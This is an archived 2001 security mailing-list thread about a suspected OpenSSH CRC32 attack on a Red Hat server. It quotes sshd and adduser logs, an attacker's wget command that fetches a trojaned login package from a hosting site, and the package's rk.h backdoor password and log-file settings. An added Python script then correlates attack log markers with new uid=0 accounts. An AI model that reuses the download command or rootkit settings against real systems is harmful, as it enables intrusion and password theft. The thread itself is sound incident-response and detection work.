We've disabled the account where the group was storing the login.tgz file.
The accounts are simply part of free hosting we provide, the box was not
hacked. See http://home.dal.net for more info about the setup.

On a similar note, I've noticed scans to port 22 increase recently.

- Aaron Schultz [Wagahai] - DALnet Webteam

On Mon, 3 Dec 2001 johan.augustssonat_private wrote:

>
> I stumbled over this post at the openssh-unix-dev mailing list last week -
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
> The poster claims that he had OpenSSH-2.9p2-8.7 (latest update for
> RedHat 7.0) up and running when he received what looks to be a
> CRC32-attack. A few minutes later you can see (he posted parts of the
> logfile) a new user being created with uid=0 and then how a connection
> is made from a system in Israel.
>
> There has been no confirmation about what he writes but I received the
> following mail as an answer to my questions.
>
> ------ Message ------
> I posted an openssh security alert earlier today and already got some
> responses.
> Thanks for everything.
>
> Instead of replying to everyone individually I composed the details of
> the attack.
>
> +++
>
> It does not look like a job of worms.
> Snort did not detect a mass port scan from the attacker's ip address. It
> seems that he (I assumed, so I don't have to type he/she all the way) just
> wants to gain access through openssh.
>
> The server is running Red Hat 7.0, with all packages up to date. The
> following daemons are running: wu-ftpd, apache, telnet, openssh, named.
> I never access the system via telnet, it is there just for backup
> purposes.
>
> > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
> > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
> > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
> > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
> > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
> > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
> > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
>
> After the attacker gained root access, he created two users, mattan and
> mattanl.
> He then downloaded a package: wget http://home.dal.net/resolve/login.tgz.
> The target site has been compromised. (hacked by a hacker group in
> Israel)
> This is a login replacement package, it logs the user id and passwords.
> He modified rk.h to:
> #define MY_LOGFILE "/dev/ttypz"
> #define MY_PASSWORD "1245890"
> After he compiled and installed the login replacement, something went
> wrong.
> /bin/login was zero bytes in length. So when he came back using telnet,
> he was denied access. I also disabled sshd and kept one session open for
> remote control after I found login was replaced. I md5 checked the system
> against a good backup, nothing else was altered.
>
> I will try to sniff all packets coming to this server on the ssh port.
> If he attempts to crack the server again, I will have more details. But
> I guess I will have to turn the server back on.
>
> Thanks for all your time
> ------ End of message ------
>
> I had some further questions so I mailed the guy once again but have not
> received any answer.
>
> So, to the main question.
> Has anyone else had a system compromised by the CRC32-attack when
> running a version of sshd that is believed to be secure? OpenSSH-2.3.0
> or later, SSH 1.2.32 or later.
>
>
>
> /Johan Augustsson
>
> --------------------------------------------------------------------
> Johan Augustsson          Phone:  +46 (0)31 773 1000
> Incident Response Team    Fax:    +46 (0)31 773 1087
> Göteborg University       E-mail: Johan.Augustssonat_private
> Sweden
> --------------------------------------------------------------------
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
> ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:23:45 PST
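The quoted log excerpt shows the two signals a practitioner would want to correlate: sshd's "crc32 compensation attack" / "Corrupted check bytes on input" disconnects, and an adduser entry creating a uid=0 account a few minutes later. The sshd message only means the detector fired on malformed packets; on its own it does not prove exploitation, which is why the account creation is the signal worth tying to it. The Python script below is an added example, not code from the thread or from either poster. It parses syslog lines, keeps the timestamps of the sshd attack markers, and raises an alert for any new account that has uid 0 and/or was created within a window after those markers. The sample log lines are constructed here, modelled on the excerpt; the syslog year (2001, since syslog omits it) and the ten-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample syslog lines, modelled on the excerpt quoted in the thread.
# They are not the poster's actual log file.  Syslog timestamps carry no year,
# so 2001 is assumed when parsing.
SAMPLE_LOG = """\
Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
"""

# Classic BSD syslog layout: "Mon DD HH:MM:SS host prog[pid]: message".
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# sshd messages emitted when the CRC32 compensation attack detector fires or
# the SSH1 packet check bytes fail, as seen in the quoted excerpt.
SSH_ATTACK_MARKERS = ("crc32 compensation attack", "Corrupted check bytes on input")
NEW_USER_RE = re.compile(r"new user: name=(?P<name>[^,]+), uid=(?P<uid>\d+)")


def parse_line(line, year=2001):
    """Return (timestamp, program, message), or None if the line is not syslog."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = " ".join(m.group("ts").split())  # collapse "Nov  5" to "Nov 5"
    when = datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")
    return when, m.group("prog"), m.group("msg")


def correlate(log_text, window=timedelta(minutes=10), year=2001):
    """Flag new accounts that are uid 0 and/or follow sshd CRC32 attack noise.

    Returns a list of alert dicts in log order.  The window is an assumed
    value; tune it to the host's normal provisioning behaviour.
    """
    attack_times = []
    alerts = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw, year)
        if parsed is None:
            continue
        when, prog, msg = parsed
        if prog == "sshd" and any(mark in msg for mark in SSH_ATTACK_MARKERS):
            attack_times.append(when)
            continue
        if prog != "adduser":
            continue
        u = NEW_USER_RE.search(msg)
        if not u:
            continue
        uid = int(u.group("uid"))
        prior = sum(1 for t in attack_times if timedelta(0) <= when - t <= window)
        reasons = []
        if uid == 0:
            reasons.append("new account with uid=0 (root-equivalent)")
        if prior:
            reasons.append(f"{prior} sshd CRC32/check-byte disconnects in the preceding {window}")
        if reasons:
            alerts.append({"time": when, "name": u.group("name"), "uid": uid,
                           "root": uid == 0, "prior_attacks": prior,
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"{a['time']:%b %d %H:%M:%S} ALERT user={a['name']} uid={a['uid']}: "
              + "; ".join(a["reasons"]))
```

Run against the sample, both accounts are flagged: mattanl only because it follows four attack-marker disconnects within the window, mattan for that and for being uid 0. A uid=0 account with a name other than root should be alerted on even without the sshd prelude; the window correlation is what separates an exploited detector from the harmless noise a broken client can also produce.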